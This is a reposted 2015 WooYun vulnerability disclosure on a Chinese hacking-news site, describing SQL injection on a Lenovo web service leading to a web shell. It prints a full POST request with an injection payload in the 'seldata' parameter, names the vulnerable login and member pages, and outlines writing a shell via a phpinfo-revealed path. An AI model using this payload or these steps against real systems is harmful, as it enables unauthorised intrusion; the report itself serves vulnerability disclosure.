记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

联想某站从注入到GETSHELL

2015-03-03 18:30

一起打包,给20rank吧



注入点一

http://yun.lenovo.com/lxymanage/login.php



在登陆口的name处未过滤导致显错注入



注入点二

http://yun.lenovo.com/lxymanage/member1.php



seldata参数未过滤



post包:

code 区域
POST /lxymanage/member1.php?id=&language=&page_now=1&pid= HTTP/1.1

Content-Length: 77

Content-Type: application/x-www-form-urlencoded

Referer: http://yun.lenovo.com/

Cookie: PHPSESSID=id632k50s93dbqe5qjdhna6gt3

Host: yun.lenovo.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



checkbox=0&checkbox35=35&checkbox36=36&checkbox37=37&seldata=1%00%c0%a7%c0%a2





1.png



2.png





由于权限是root权限,那么只要知道路径就能写shell了

扫描了下,在跟目录有个a.php的phpinfo ,得到路径为/opt/css/a.php

33.png



于是拿到shell

4.png



3.png





漏洞证明:

5.png

修复方案:

你们懂的


知识来源: www.wooyun.org/bugs/wooyun-2015-092429

阅读:159997 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“联想某站从注入到GETSHELL”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁